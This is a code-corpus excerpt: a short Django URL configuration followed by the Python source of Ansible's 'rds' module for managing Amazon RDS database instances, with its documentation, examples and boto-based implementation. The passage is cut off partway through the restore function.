from django.conf.urls.defaults import * from views import empty_view urlpatterns = patterns('', url(r'^$', empty_view, name="named-url3"), url(r'^extra/(?P<extra>\w+)/$', empty_view, name="named-url4"), url(r'^(?P<one>\d+)|(?P<two>\d+)/$', empty_view), (r'^included/', include('regressiontests.urlpatterns_reverse.included_named_urls2')), )
grilo/ansible-1
refs/heads/devel
lib/ansible/modules/cloud/amazon/rds.py
5
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: rds version_added: "1.3" short_description: create, delete, or modify an Amazon rds instance description: - Creates, deletes, or modifies rds instances. When creating an instance it can be either a new instance or a read-only replica of an existing instance. This module has a dependency on python-boto >= 2.5. The 'promote' command requires boto >= 2.18.0. Certain features such as tags rely on boto.rds2 (boto >= 2.26.0) options: command: description: - Specifies the action to take. The 'reboot' option is available starting at version 2.0 required: true choices: [ 'create', 'replicate', 'delete', 'facts', 'modify' , 'promote', 'snapshot', 'reboot', 'restore' ] instance_name: description: - Database instance identifier. Required except when using command=facts or command=delete on just a snapshot required: false default: null source_instance: description: - Name of the database to replicate. Used only when command=replicate. required: false default: null db_engine: description: - The type of database. Used only when command=create. - mariadb was added in version 2.2 required: false default: null choices: ['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee', 'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex', 'sqlserver-web', 'postgres', 'aurora'] size: description: - Size in gigabytes of the initial storage for the DB instance. Used only when command=create or command=modify. required: false default: null instance_type: description: - The instance type of the database. Must be specified when command=create. Optional when command=replicate, command=modify or command=restore. If not specified then the replica inherits the same instance type as the source instance. required: false default: null username: description: - Master database username. Used only when command=create. required: false default: null password: description: - Password for the master database username. Used only when command=create or command=modify. required: false default: null region: description: - The AWS region to use. If not specified then the value of the EC2_REGION environment variable, if any, is used. required: true aliases: [ 'aws_region', 'ec2_region' ] db_name: description: - Name of a database to create within the instance. If not specified then no database is created. Used only when command=create. required: false default: null engine_version: description: - Version number of the database engine to use. Used only when command=create. If not specified then the current Amazon RDS default engine version is used required: false default: null parameter_group: description: - Name of the DB parameter group to associate with this instance. If omitted then the RDS default DBParameterGroup will be used. Used only when command=create or command=modify. required: false default: null license_model: description: - The license model for this DB instance. Used only when command=create or command=restore. required: false default: null choices: [ 'license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license' ] multi_zone: description: - Specifies if this is a Multi-availability-zone deployment. Can not be used in conjunction with zone parameter. Used only when command=create or command=modify. choices: [ "yes", "no" ] required: false default: null iops: description: - Specifies the number of IOPS for the instance. Used only when command=create or command=modify. Must be an integer greater than 1000. required: false default: null security_groups: description: - Comma separated list of one or more security groups. Used only when command=create or command=modify. required: false default: null vpc_security_groups: description: - Comma separated list of one or more vpc security group ids. Also requires `subnet` to be specified. Used only when command=create or command=modify. required: false default: null port: description: - Port number that the DB instance uses for connections. Used only when command=create or command=replicate. - Prior to 2.0 it always defaults to null and the API would use 3306, it had to be set to other DB default values when not using MySql. Starting at 2.0 it automatically defaults to what is expected for each c(db_engine). required: false default: 3306 for mysql, 1521 for Oracle, 1433 for SQL Server, 5432 for PostgreSQL. upgrade: description: - Indicates that minor version upgrades should be applied automatically. Used only when command=create or command=replicate. required: false default: no choices: [ "yes", "no" ] option_group: description: - The name of the option group to use. If not specified then the default option group is used. Used only when command=create. required: false default: null maint_window: description: - > Maintenance window in format of ddd:hh24:mi-ddd:hh24:mi. (Example: Mon:22:00-Mon:23:15) If not specified then a random maintenance window is assigned. Used only when command=create or command=modify. required: false default: null backup_window: description: - Backup window in format of hh24:mi-hh24:mi. If not specified then a random backup window is assigned. Used only when command=create or command=modify. required: false default: null backup_retention: description: - > Number of days backups are retained. Set to 0 to disable backups. Default is 1 day. Valid range: 0-35. Used only when command=create or command=modify. required: false default: null zone: description: - availability zone in which to launch the instance. Used only when command=create, command=replicate or command=restore. required: false default: null aliases: ['aws_zone', 'ec2_zone'] subnet: description: - VPC subnet group. If specified then a VPC instance is created. Used only when command=create. required: false default: null snapshot: description: - Name of snapshot to take. When command=delete, if no snapshot name is provided then no snapshot is taken. If used with command=delete with no instance_name, the snapshot is deleted. Used with command=facts, command=delete or command=snapshot. required: false default: null aws_secret_key: description: - AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used. required: false aliases: [ 'ec2_secret_key', 'secret_key' ] aws_access_key: description: - AWS access key. If not set then the value of the AWS_ACCESS_KEY environment variable is used. required: false default: null aliases: [ 'ec2_access_key', 'access_key' ] wait: description: - When command=create, replicate, modify or restore then wait for the database to enter the 'available' state. When command=delete wait for the database to be terminated. required: false default: "no" choices: [ "yes", "no" ] wait_timeout: description: - how long before wait gives up, in seconds default: 300 apply_immediately: description: - Used only when command=modify. If enabled, the modifications will be applied as soon as possible rather than waiting for the next preferred maintenance window. default: no choices: [ "yes", "no" ] force_failover: description: - Used only when command=reboot. If enabled, the reboot is done using a MultiAZ failover. required: false default: "no" choices: [ "yes", "no" ] version_added: "2.0" new_instance_name: description: - Name to rename an instance to. Used only when command=modify. required: false default: null version_added: "1.5" character_set_name: description: - Associate the DB instance with a specified character set. Used with command=create. required: false default: null version_added: "1.9" publicly_accessible: description: - explicitly set whether the resource should be publicly accessible or not. Used with command=create, command=replicate. Requires boto >= 2.26.0 required: false default: null version_added: "1.9" tags: description: - tags dict to apply to a resource. Used with command=create, command=replicate, command=restore. Requires boto >= 2.26.0 required: false default: null version_added: "1.9" requirements: - "python >= 2.6" - "boto" author: - "Bruce Pennypacker (@bpennypacker)" - "Will Thames (@willthames)" extends_documentation_fragment: - aws - ec2 ''' # FIXME: the command stuff needs a 'state' like alias to make things consistent -- MPD EXAMPLES = ''' # Basic mysql provisioning example - rds: command: create instance_name: new-database db_engine: MySQL size: 10 instance_type: db.m1.small username: mysql_admin password: 1nsecure tags: Environment: testing Application: cms # Create a read-only replica and wait for it to become available - rds: command: replicate instance_name: new-database-replica source_instance: new_database wait: yes wait_timeout: 600 # Delete an instance, but create a snapshot before doing so - rds: command: delete instance_name: new-database snapshot: new_database_snapshot # Get facts about an instance - rds: command: facts instance_name: new-database register: new_database_facts # Rename an instance and wait for the change to take effect - rds: command: modify instance_name: new-database new_instance_name: renamed-database wait: yes # Reboot an instance and wait for it to become available again - rds: command: reboot instance_name: database wait: yes # Restore a Postgres db instance from a snapshot, wait for it to become available again, and # then modify it to add your security group. Also, display the new endpoint. # Note that the "publicly_accessible" option is allowed here just as it is in the AWS CLI - local_action: module: rds command: restore snapshot: mypostgres-snapshot instance_name: MyNewInstanceName region: us-west-2 zone: us-west-2b subnet: default-vpc-xx441xxx publicly_accessible: yes wait: yes wait_timeout: 600 tags: Name: pg1_test_name_tag register: rds - local_action: module: rds command: modify instance_name: MyNewInstanceName region: us-west-2 vpc_security_groups: sg-xxx945xx - debug: msg: "The new db endpoint is {{ rds.instance.endpoint }}" ''' RETURN = ''' engine: description: the name of the database engine returned: when RDS instance exists type: string sample: "oracle-se" engine_version: description: the version of the database engine returned: when RDS instance exists type: string sample: "11.2.0.4.v6" license_model: description: the license model information returned: when RDS instance exists type: string sample: "bring-your-own-license" character_set_name: description: the name of the character set that this instance is associated with returned: when RDS instance exists type: string sample: "AL32UTF8" allocated_storage: description: the allocated storage size in gigabytes (GB) returned: when RDS instance exists type: string sample: "100" publicly_accessible: description: the accessibility options for the DB instance returned: when RDS instance exists type: boolean sample: "true" latest_restorable_time: description: the latest time to which a database can be restored with point-in-time restore returned: when RDS instance exists type: string sample: "1489707802.0" secondary_avaialbility_zone: description: the name of the secondary AZ for a DB instance with multi-AZ support returned: when RDS instance exists and is multy-AZ type: string sample: "eu-west-1b" backup_window: description: the daily time range during which automated backups are created if automated backups are enabled returned: when RDS instance exists and automated backups are enabled type: string sample: "03:00-03:30" auto_minor_version_upgrade: description: indicates that minor engine upgrades will be applied automatically to the DB instance during the maintenance window returned: when RDS instance exists type: boolean sample: "true" read_replica_source_dbinstance_identifier: description: the identifier of the source DB instance if this RDS instance is a read replica returned: when read replica RDS instance exists type: string sample: "null" db_name: description: the name of the database to create when the DB instance is created returned: when RDS instance exists type: string sample: "ASERTG" parameter_groups: description: the list of DB parameter groups applied to this RDS instance returned: when RDS instance exists and parameter groups are defined type: complex contains: parameter_apply_status: description: the status of parameter updates returned: when RDS instance exists type: string sample: "in-sync" parameter_group_name: description: the name of the DP parameter group returned: when RDS instance exists type: string sample: "testawsrpprodb01spfile-1ujg7nrs7sgyz" option_groups: description: the list of option group memberships for this RDS instance returned: when RDS instance exists type: complex contains: option_group_name: description: the option group name for this RDS instance returned: when RDS instance exists type: string sample: "default:oracle-se-11-2" status: description: the status of the RDS instance's option group membership returned: when RDS instance exists type: string sample: "in-sync" pending_modified_values: description: a dictionary of changes to the RDS instance that are pending returned: when RDS instance exists type: complex contains: db_instance_class: description: the new DB instance class for this RDS instance that will be applied or is in progress returned: when RDS instance exists type: string sample: "null" db_instance_identifier: description: the new DB instance identifier this RDS instance that will be applied or is in progress returned: when RDS instance exists type: string sample: "null" allocated_storage: description: the new allocated storage size for this RDS instance that will be applied or is in progress returned: when RDS instance exists type: string sample: "null" backup_retention_period: description: the pending number of days for which automated backups are retained returned: when RDS instance exists type: string sample: "null" engine_version: description: indicates the database engine version returned: when RDS instance exists type: string sample: "null" iops: description: the new provisioned IOPS value for this RDS instance that will be applied or is being applied returned: when RDS instance exists type: string sample: "null" master_user_password: description: the pending or in-progress change of the master credentials for this RDS instance returned: when RDS instance exists type: string sample: "null" multi_az: description: indicates that the single-AZ RDS instance is to change to a multi-AZ deployment returned: when RDS instance exists type: string sample: "null" port: description: specifies the pending port for this RDS instance returned: when RDS instance exists type: string sample: "null" db_subnet_groups: description: information on the subnet group associated with this RDS instance returned: when RDS instance exists type: complex contains: description: description: the subnet group associated with the DB instance returned: when RDS instance exists type: string sample: "Subnets for the UAT RDS SQL DB Instance" name: description: the name of the DB subnet group returned: when RDS instance exists type: string sample: "samplesubnetgrouprds-j6paiqkxqp4z" status: description: the status of the DB subnet group returned: when RDS instance exists type: string sample: "complete" subnets: description: the description of the DB subnet group returned: when RDS instance exists type: complex contains: availability_zone: description: subnet availability zone information returned: when RDS instance exists type: complex contains: name: description: avaialbility zone returned: when RDS instance exists type: string sample: "eu-west-1b" provisioned_iops_capable: description: whether provisioned iops are available in AZ subnet returned: when RDS instance exists type: boolean sample: "false" identifier: description: the identifier of the subnet returned: when RDS instance exists type: string sample: "subnet-3fdba63e" status: description: the status of the subnet returned: when RDS instance exists type: string sample: "active" ''' import sys import time from ansible.module_utils.ec2 import AWSRetry try: import boto.rds HAS_BOTO = True except ImportError: HAS_BOTO = False try: import boto.rds2 has_rds2 = True except ImportError: has_rds2 = False DEFAULT_PORTS = { 'aurora': 3306, 'mariadb': 3306, 'mysql': 3306, 'oracle': 1521, 'sqlserver': 1433, 'postgres': 5432, } class RDSException(Exception): def __init__(self, exc): if hasattr(exc, 'error_message') and exc.error_message: self.message = exc.error_message self.code = exc.error_code elif hasattr(exc, 'body') and 'Error' in exc.body: self.message = exc.body['Error']['Message'] self.code = exc.body['Error']['Code'] else: self.message = str(exc) self.code = 'Unknown Error' class RDSConnection: def __init__(self, module, region, **aws_connect_params): try: self.connection = connect_to_aws(boto.rds, region, **aws_connect_params) except boto.exception.BotoServerError as e: module.fail_json(msg=e.error_message) def get_db_instance(self, instancename): try: return RDSDBInstance(self.connection.get_all_dbinstances(instancename)[0]) except boto.exception.BotoServerError as e: return None def get_db_snapshot(self, snapshotid): try: return RDSSnapshot(self.connection.get_all_dbsnapshots(snapshot_id=snapshotid)[0]) except boto.exception.BotoServerError as e: return None def create_db_instance(self, instance_name, size, instance_class, db_engine, username, password, **params): params['engine'] = db_engine try: result = self.connection.create_dbinstance(instance_name, size, instance_class, username, password, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_instance_read_replica(self, instance_name, source_instance, **params): try: result = self.connection.createdb_instance_read_replica(instance_name, source_instance, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_instance(self, instance_name, **params): try: result = self.connection.delete_dbinstance(instance_name, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_snapshot(self, snapshot): try: result = self.connection.delete_dbsnapshot(snapshot) return RDSSnapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def modify_db_instance(self, instance_name, **params): try: result = self.connection.modify_dbinstance(instance_name, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def reboot_db_instance(self, instance_name, **params): try: result = self.connection.reboot_dbinstance(instance_name) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params): try: result = self.connection.restore_dbinstance_from_dbsnapshot(snapshot, instance_name, instance_type, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_snapshot(self, snapshot, instance_name, **params): try: result = self.connection.create_dbsnapshot(snapshot, instance_name) return RDSSnapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def promote_read_replica(self, instance_name, **params): try: result = self.connection.promote_read_replica(instance_name, **params) return RDSDBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) class RDS2Connection: def __init__(self, module, region, **aws_connect_params): try: self.connection = connect_to_aws(boto.rds2, region, **aws_connect_params) except boto.exception.BotoServerError as e: module.fail_json(msg=e.error_message) def get_db_instance(self, instancename): try: dbinstances = self.connection.describe_db_instances( db_instance_identifier=instancename )['DescribeDBInstancesResponse']['DescribeDBInstancesResult']['DBInstances'] result = RDS2DBInstance(dbinstances[0]) return result except boto.rds2.exceptions.DBInstanceNotFound as e: return None except Exception as e: raise e def get_db_snapshot(self, snapshotid): try: snapshots = self.connection.describe_db_snapshots( db_snapshot_identifier=snapshotid, snapshot_type='manual' )['DescribeDBSnapshotsResponse']['DescribeDBSnapshotsResult']['DBSnapshots'] result = RDS2Snapshot(snapshots[0]) return result except boto.rds2.exceptions.DBSnapshotNotFound as e: return None def create_db_instance(self, instance_name, size, instance_class, db_engine, username, password, **params): try: result = self.connection.create_db_instance(instance_name, size, instance_class, db_engine, username, password, **params)['CreateDBInstanceResponse']['CreateDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_instance_read_replica(self, instance_name, source_instance, **params): try: result = self.connection.create_db_instance_read_replica( instance_name, source_instance, **params )['CreateDBInstanceReadReplicaResponse']['CreateDBInstanceReadReplicaResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_instance(self, instance_name, **params): try: result = self.connection.delete_db_instance(instance_name, **params)['DeleteDBInstanceResponse']['DeleteDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def delete_db_snapshot(self, snapshot): try: result = self.connection.delete_db_snapshot(snapshot)['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot'] return RDS2Snapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def modify_db_instance(self, instance_name, **params): try: result = self.connection.modify_db_instance(instance_name, **params)['ModifyDBInstanceResponse']['ModifyDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def reboot_db_instance(self, instance_name, **params): try: result = self.connection.reboot_db_instance(instance_name, **params)['RebootDBInstanceResponse']['RebootDBInstanceResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params): try: result = self.connection.restore_db_instance_from_db_snapshot( instance_name, snapshot, **params )['RestoreDBInstanceFromDBSnapshotResponse']['RestoreDBInstanceFromDBSnapshotResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) def create_db_snapshot(self, snapshot, instance_name, **params): try: result = self.connection.create_db_snapshot(snapshot, instance_name, **params)['CreateDBSnapshotResponse']['CreateDBSnapshotResult']['DBSnapshot'] return RDS2Snapshot(result) except boto.exception.BotoServerError as e: raise RDSException(e) def promote_read_replica(self, instance_name, **params): try: result = self.connection.promote_read_replica(instance_name, **params)['PromoteReadReplicaResponse']['PromoteReadReplicaResult']['DBInstance'] return RDS2DBInstance(result) except boto.exception.BotoServerError as e: raise RDSException(e) class RDSDBInstance: def __init__(self, dbinstance): self.instance = dbinstance self.name = dbinstance.id self.status = dbinstance.status def get_data(self): d = { 'id': self.name, 'create_time': self.instance.create_time, 'status': self.status, 'availability_zone': self.instance.availability_zone, 'backup_retention': self.instance.backup_retention_period, 'backup_window': self.instance.preferred_backup_window, 'maintenance_window': self.instance.preferred_maintenance_window, 'multi_zone': self.instance.multi_az, 'instance_type': self.instance.instance_class, 'username': self.instance.master_username, 'iops': self.instance.iops } # Only assign an Endpoint if one is available if hasattr(self.instance, 'endpoint'): d["endpoint"] = self.instance.endpoint[0] d["port"] = self.instance.endpoint[1] if self.instance.vpc_security_groups is not None: d["vpc_security_groups"] = ','.join(x.vpc_group for x in self.instance.vpc_security_groups) else: d["vpc_security_groups"] = None else: d["endpoint"] = None d["port"] = None d["vpc_security_groups"] = None # ReadReplicaSourceDBInstanceIdentifier may or may not exist try: d["replication_source"] = self.instance.ReadReplicaSourceDBInstanceIdentifier except Exception as e: d["replication_source"] = None return d class RDS2DBInstance: def __init__(self, dbinstance): self.instance = dbinstance if 'DBInstanceIdentifier' not in dbinstance: self.name = None else: self.name = self.instance.get('DBInstanceIdentifier') self.status = self.instance.get('DBInstanceStatus') def get_data(self): d = { 'id': self.name, 'create_time': self.instance['InstanceCreateTime'], 'engine': self.instance['Engine'], 'engine_version': self.instance['EngineVersion'], 'license_model': self.instance['LicenseModel'], 'character_set_name': self.instance['CharacterSetName'], 'allocated_storage': self.instance['AllocatedStorage'], 'publicly_accessible': self.instance['PubliclyAccessible'], 'latest_restorable_time': self.instance['LatestRestorableTime'], 'status': self.status, 'availability_zone': self.instance['AvailabilityZone'], 'secondary_avaialbility_zone': self.instance['SecondaryAvailabilityZone'], 'backup_retention': self.instance['BackupRetentionPeriod'], 'backup_window': self.instance['PreferredBackupWindow'], 'maintenance_window': self.instance['PreferredMaintenanceWindow'], 'auto_minor_version_upgrade': self.instance['AutoMinorVersionUpgrade'], 'read_replica_source_dbinstance_identifier': self.instance['ReadReplicaSourceDBInstanceIdentifier'], 'multi_zone': self.instance['MultiAZ'], 'instance_type': self.instance['DBInstanceClass'], 'username': self.instance['MasterUsername'], 'db_name': self.instance['DBName'], 'iops': self.instance['Iops'], 'replication_source': self.instance['ReadReplicaSourceDBInstanceIdentifier'] } if self.instance['DBParameterGroups'] is not None: parameter_groups = [] for x in self.instance['DBParameterGroups']: parameter_groups.append({'parameter_group_name': x['DBParameterGroupName'], 'parameter_apply_status': x['ParameterApplyStatus']}) d['parameter_groups'] = parameter_groups if self.instance['OptionGroupMemberships'] is not None: option_groups = [] for x in self.instance['OptionGroupMemberships']: option_groups.append({'status': x['Status'], 'option_group_name': x['OptionGroupName']}) d['option_groups'] = option_groups if self.instance['PendingModifiedValues'] is not None: pdv = self.instance['PendingModifiedValues'] d['pending_modified_values'] = { 'multi_az': pdv['MultiAZ'], 'master_user_password': pdv['MasterUserPassword'], 'port': pdv['Port'], 'iops': pdv['Iops'], 'allocated_storage': pdv['AllocatedStorage'], 'engine_version': pdv['EngineVersion'], 'backup_retention_period': pdv['BackupRetentionPeriod'], 'db_instance_class': pdv['DBInstanceClass'], 'db_instance_identifier': pdv['DBInstanceIdentifier'] } if self.instance["DBSubnetGroup"] is not None: dsg = self.instance["DBSubnetGroup"] db_subnet_groups = {} db_subnet_groups['vpc_id'] = dsg['VpcId'] db_subnet_groups['name'] = dsg['DBSubnetGroupName'] db_subnet_groups['status'] = dsg['SubnetGroupStatus'].lower() db_subnet_groups['description'] = dsg['DBSubnetGroupDescription'] db_subnet_groups['subnets'] = [] for x in dsg["Subnets"]: db_subnet_groups['subnets'].append({ 'status': x['SubnetStatus'].lower(), 'identifier': x['SubnetIdentifier'], 'availability_zone': { 'name': x['SubnetAvailabilityZone']['Name'], 'provisioned_iops_capable': x['SubnetAvailabilityZone']['ProvisionedIopsCapable'] } }) d['db_subnet_groups'] = db_subnet_groups if self.instance["VpcSecurityGroups"] is not None: d['vpc_security_groups'] = ','.join(x['VpcSecurityGroupId'] for x in self.instance['VpcSecurityGroups']) if "Endpoint" in self.instance and self.instance["Endpoint"] is not None: d['endpoint'] = self.instance["Endpoint"].get('Address', None) d['port'] = self.instance["Endpoint"].get('Port', None) else: d['endpoint'] = None d['port'] = None return d class RDSSnapshot: def __init__(self, snapshot): self.snapshot = snapshot self.name = snapshot.id self.status = snapshot.status def get_data(self): d = { 'id': self.name, 'create_time': self.snapshot.snapshot_create_time, 'status': self.status, 'availability_zone': self.snapshot.availability_zone, 'instance_id': self.snapshot.instance_id, 'instance_created': self.snapshot.instance_create_time, } # needs boto >= 2.21.0 if hasattr(self.snapshot, 'snapshot_type'): d["snapshot_type"] = self.snapshot.snapshot_type if hasattr(self.snapshot, 'iops'): d["iops"] = self.snapshot.iops return d class RDS2Snapshot: def __init__(self, snapshot): if 'DeleteDBSnapshotResponse' in snapshot: self.snapshot = snapshot['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot'] else: self.snapshot = snapshot self.name = self.snapshot.get('DBSnapshotIdentifier') self.status = self.snapshot.get('Status') def get_data(self): d = { 'id': self.name, 'create_time': self.snapshot['SnapshotCreateTime'], 'status': self.status, 'availability_zone': self.snapshot['AvailabilityZone'], 'instance_id': self.snapshot['DBInstanceIdentifier'], 'instance_created': self.snapshot['InstanceCreateTime'], 'snapshot_type': self.snapshot['SnapshotType'], 'iops': self.snapshot['Iops'], } return d def await_resource(conn, resource, status, module): start_time = time.time() wait_timeout = module.params.get('wait_timeout') + start_time check_interval = 5 while wait_timeout > time.time() and resource.status != status: time.sleep(check_interval) if wait_timeout <= time.time(): module.fail_json(msg="Timeout waiting for RDS resource %s" % resource.name) if module.params.get('command') == 'snapshot': # Temporary until all the rds2 commands have their responses parsed if resource.name is None: module.fail_json(msg="There was a problem waiting for RDS snapshot %s" % resource.snapshot) # Back off if we're getting throttled, since we're just waiting anyway resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_snapshot)(resource.name) else: # Temporary until all the rds2 commands have their responses parsed if resource.name is None: module.fail_json(msg="There was a problem waiting for RDS instance %s" % resource.instance) # Back off if we're getting throttled, since we're just waiting anyway resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_instance)(resource.name) if resource is None: break # Some RDS resources take much longer than others to be ready. Check # less aggressively for slow ones to avoid throttling. if time.time() > start_time + 90: check_interval = 20 return resource def create_db_instance(module, conn): subnet = module.params.get('subnet') required_vars = ['instance_name', 'db_engine', 'size', 'instance_type', 'username', 'password'] valid_vars = ['backup_retention', 'backup_window', 'character_set_name', 'db_name', 'engine_version', 'instance_type', 'iops', 'license_model', 'maint_window', 'multi_zone', 'option_group', 'parameter_group', 'port', 'subnet', 'upgrade', 'zone'] if module.params.get('subnet'): valid_vars.append('vpc_security_groups') else: valid_vars.append('security_groups') if has_rds2: valid_vars.extend(['publicly_accessible', 'tags']) params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') result = conn.get_db_instance(instance_name) if result: changed = False else: try: result = conn.create_db_instance(instance_name, module.params.get('size'), module.params.get('instance_type'), module.params.get('db_engine'), module.params.get('username'), module.params.get('password'), **params) changed = True except RDSException as e: module.fail_json(msg="Failed to create instance: %s" % e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def replicate_db_instance(module, conn): required_vars = ['instance_name', 'source_instance'] valid_vars = ['instance_type', 'port', 'upgrade', 'zone'] if has_rds2: valid_vars.extend(['iops', 'option_group', 'publicly_accessible', 'tags']) params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') source_instance = module.params.get('source_instance') result = conn.get_db_instance(instance_name) if result: changed = False else: try: result = conn.create_db_instance_read_replica(instance_name, source_instance, **params) changed = True except RDSException as e: module.fail_json(msg="Failed to create replica instance: %s " % e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def delete_db_instance_or_snapshot(module, conn): required_vars = [] valid_vars = ['instance_name', 'snapshot', 'skip_final_snapshot'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') snapshot = module.params.get('snapshot') if not instance_name: result = conn.get_db_snapshot(snapshot) else: result = conn.get_db_instance(instance_name) if not result: module.exit_json(changed=False) if result.status == 'deleting': module.exit_json(changed=False) try: if instance_name: if snapshot: params["skip_final_snapshot"] = False if has_rds2: params["final_db_snapshot_identifier"] = snapshot else: params["final_snapshot_id"] = snapshot else: params["skip_final_snapshot"] = True result = conn.delete_db_instance(instance_name, **params) else: result = conn.delete_db_snapshot(snapshot) except RDSException as e: module.fail_json(msg="Failed to delete instance: %s" % e.message) # If we're not waiting for a delete to complete then we're all done # so just return if not module.params.get('wait'): module.exit_json(changed=True) try: resource = await_resource(conn, result, 'deleted', module) module.exit_json(changed=True) except RDSException as e: if e.code == 'DBInstanceNotFound': module.exit_json(changed=True) else: module.fail_json(msg=e.message) except Exception as e: module.fail_json(msg=str(e)) def facts_db_instance_or_snapshot(module, conn): required_vars = [] valid_vars = ['instance_name', 'snapshot'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') snapshot = module.params.get('snapshot') if instance_name and snapshot: module.fail_json(msg="Facts must be called with either instance_name or snapshot, not both") if instance_name: resource = conn.get_db_instance(instance_name) if not resource: module.fail_json(msg="DB instance %s does not exist" % instance_name) if snapshot: resource = conn.get_db_snapshot(snapshot) if not resource: module.fail_json(msg="DB snapshot %s does not exist" % snapshot) module.exit_json(changed=False, instance=resource.get_data()) def modify_db_instance(module, conn): required_vars = ['instance_name'] valid_vars = ['apply_immediately', 'backup_retention', 'backup_window', 'db_name', 'engine_version', 'instance_type', 'iops', 'license_model', 'maint_window', 'multi_zone', 'new_instance_name', 'option_group', 'parameter_group', 'password', 'size', 'upgrade'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') new_instance_name = module.params.get('new_instance_name') try: result = conn.modify_db_instance(instance_name, **params) except RDSException as e: module.fail_json(msg=e.message) if params.get('apply_immediately'): if new_instance_name: # Wait until the new instance name is valid new_instance = None while not new_instance: new_instance = conn.get_db_instance(new_instance_name) time.sleep(5) # Found instance but it briefly flicks to available # before rebooting so let's wait until we see it rebooting # before we check whether to 'wait' result = await_resource(conn, new_instance, 'rebooting', module) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) # guess that this changed the DB, need a way to check module.exit_json(changed=True, instance=resource.get_data()) def promote_db_instance(module, conn): required_vars = ['instance_name'] valid_vars = ['backup_retention', 'backup_window'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') result = conn.get_db_instance(instance_name) if not result: module.fail_json(msg="DB Instance %s does not exist" % instance_name) if result.get_data().get('replication_source'): try: result = conn.promote_read_replica(instance_name, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) else: changed = False if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def snapshot_db_instance(module, conn): required_vars = ['instance_name', 'snapshot'] valid_vars = ['tags'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') snapshot = module.params.get('snapshot') changed = False result = conn.get_db_snapshot(snapshot) if not result: try: result = conn.create_db_snapshot(snapshot, instance_name, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_snapshot(snapshot) module.exit_json(changed=changed, snapshot=resource.get_data()) def reboot_db_instance(module, conn): required_vars = ['instance_name'] valid_vars = [] if has_rds2: valid_vars.append('force_failover') params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') result = conn.get_db_instance(instance_name) changed = False try: result = conn.reboot_db_instance(instance_name, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def restore_db_instance(module, conn): required_vars = ['instance_name', 'snapshot'] valid_vars = ['db_name', 'iops', 'license_model', 'multi_zone', 'option_group', 'port', 'publicly_accessible', 'subnet', 'tags', 'upgrade', 'zone'] if has_rds2: valid_vars.append('instance_type') else: required_vars.append('instance_type') params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') instance_type = module.params.get('instance_type') snapshot = module.params.get('snapshot') changed = False result = conn.get_db_instance(instance_name) if not result: try: result = conn.restore_db_instance_from_db_snapshot(instance_name, snapshot, instance_type, **params) changed = 